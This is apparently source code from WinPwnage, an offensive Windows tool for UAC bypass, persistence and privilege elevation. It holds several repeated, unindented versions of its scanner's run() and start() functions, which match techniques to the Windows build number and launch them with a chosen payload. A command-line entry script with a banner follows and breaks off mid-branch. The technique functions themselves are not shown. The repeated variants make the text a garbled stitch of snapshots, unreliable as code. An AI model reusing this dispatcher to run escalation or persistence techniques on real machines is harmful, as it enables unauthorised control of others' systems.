def run(self, id, payload, **kwargs):
print_info("Attempting to run id ({}) configured with payload ({})".format(id, payload))
for i in functions:
#if i == 'uac' and not self.uac or i == 'persist' and not self.persist or i == 'elevate' and not self.elevate:
if i == 'uac' and not self.uac or i == 'persist' and not self.persist or i == 'elevate' and not self.elevate or i == 'execute' and not self.execute:
continue
for info in functions[i]:
if id in str(info["Id"]):
if int(info["Works From"]) <= int(information().build_number()) < int(info["Fixed In"]):
f = globals()[info["Function Name"]]
# if name is not needed in function, just keep goin
if 'name' not in f.__code__.co_varnames and 'add' in f.__code__.co_varnames:
f(payload, add=kwargs.get('add', True))
# if name is needed for the function to run, just add a dummy
# this is mainly to support pupy intergration, wich needs custom
# names in order to work.
elif 'name' in f.__code__.co_varnames and 'add' in f.__code__.co_varnames:
f(payload, name=kwargs.get('name', 'WinPwnage'), add=kwargs.get('add', True))
# if function only needs payload as argument, eg. uac functions
else:
f(payload)
else:
print_error('Technique not compatible with this system.')
return Constant.output
else:
pass
def run(self, id, payload, **kwargs):
print_info(
"Attempting to run method ({id}) configured with payload ({payload})"
.format(id=id, payload=payload))
for i in functions:
if i == "uac" and not self.uac or i == "persist" and not self.persist or i == "elevate" and not self.elevate:
continue
for info in functions[i]:
if id in str(info["Id"]):
if int(info["Works From"]) <= int(
information().build_number()) < int(
info["Fixed In"]):
f = globals()[info["Function Name"]]
if "name" not in f.__code__.co_varnames and "add" in f.__code__.co_varnames:
f(payload, add=kwargs.get("add", True))
elif "name" in f.__code__.co_varnames and "add" in f.__code__.co_varnames:
f(payload,
name=kwargs.get("name", "WinPwnage"),
add=kwargs.get("add", True))
else:
f(payload)
else:
print_error(
"Technique not compatible with this system.")
return Constant.output
else:
pass
def start(self):
print_info(
"Comparing build number ({}) against 'Fixed In' build numbers, false positives might happen."
.format(information().build_number()))
print_table()
fmt = "\t{Type}\t{Function Payload}\t\t{Admin}\t\t{Description}"
for i in functions:
if i == 'uac' and not self.uac or i == 'persist' and not self.persist or i == 'elevate' and not self.elevate or i == 'execute' and not self.execute:
continue
for info in functions[i]:
if int(info["Works From"]) <= int(
information().build_number()) < int(info["Fixed In"]):
table_success(info["Id"], fmt.format(**info))
else:
table_error(info["Id"], fmt.format(**info))
return Constant.output
def start(self):
print_info(
"Comparing build number ({buildnumber}) against 'Fixed In' build numbers"
.format(buildnumber=information().build_number()))
print_table()
for i in functions:
if i == "uac" and not self.uac or i == "persist" and not self.persist or i == "elevate" and not self.elevate:
continue
for info in functions[i]:
if int(info["Works From"]) <= int(
information().build_number()) < int(info["Fixed In"]):
table_success(id=info["Id"],
type=info["Type"],
description=info["Description"])
else:
table_error(id=info["Id"],
type=info["Type"],
description=info["Description"])
return Constant.output
def start(self):
print_info(
"Comparing build number ({}) against 'Fixed In' build numbers, false positives might happen."
.format(information().build_number()))
print_table()
for i in functions:
if i == 'uac' and not self.uac or i == 'persist' and not self.persist:
continue
for info in functions[i]:
if int(info["Works From"]) <= int(
information().build_number()) < int(info["Fixed In"]):
table_success(
info["Id"], "\t{}\t{}\t\t{}\t\t{}".format(
str(info["Type"]), str(info["Function Payload"]),
str(info["Admin"]), str(info["Description"])))
else:
table_error(
info["Id"], "\t{}\t{}\t\t{}\t\t{}".format(
str(info["Type"]), str(info["Function Payload"]),
str(info["Admin"]), str(info["Description"])))
return Constant.output
def run(self, id, payload, **kwargs):
print_info("Attempting to run id ({}) configured with payload ({})".format(id, payload))
for i in functions:
if i == 'uac' and not self.uac or i == 'persist' and not self.persist:
continue
for info in functions[i]:
if id in str(info["Id"]):
if int(info["Works From"]) <= int(information().build_number()) < int(info["Fixed In"]):
f = globals()[info["Function Name"]]
if 'name' in f.__code__.co_varnames and 'add' in f.__code__.co_varnames:
f(payload, name=kwargs.get('name', ''), add=kwargs.get('add', True))
else:
f(payload)
else:
print_error('Technique not compatible with this system.')
return Constant.output
else:
pass
def run(self, id, payload):
print_info(
"Attempting to run id ({}) configured with payload ({})".format(
id, payload))
for i in functions:
if i == 'uac' and not self.uac or i == 'persist' and not self.persist:
continue
for info in functions[i]:
if id in str(info["Id"]):
if int(info["Works From"]) <= int(
information().build_number()) < int(
info["Fixed In"]):
globals()[info["Function Name"]](os.path.join(payload))
else:
print_error(
'Technique not compatible with this system.')
return Constant.output
else:
pass
return False
from __future__ import print_function
import sys
from winpwnage.core.prints import print_info
from winpwnage.core.scanner import scanner, function
from winpwnage.core.utils import information
print("""
_
_ _ _|_|___ ___ _ _ _ ___ ___ ___ ___
| | | | | | . | | | | | .'| . | -_|
|_____|_|_|_| _|_____|_|_|__,|_ |___|
|_| |___|
""")
print_info("UAC level: {}".format(information().uac_level()))
print_info("Build number: {}".format(information().build_number()))
print_info("Running elevated: {}\n".format(information().admin()))
def main():
#
# Scanner
#
if sys.argv[1].lower() == "-scan":
if sys.argv[2].lower() == "-uac":
scanner(uac=True, persist=False, elevate=False,
execute=False).start()
elif sys.argv[2].lower() == "-persist":
scanner(uac=False, persist=True, elevate=False,
execute=False).start()
elif sys.argv[2].lower() == "-elevate":
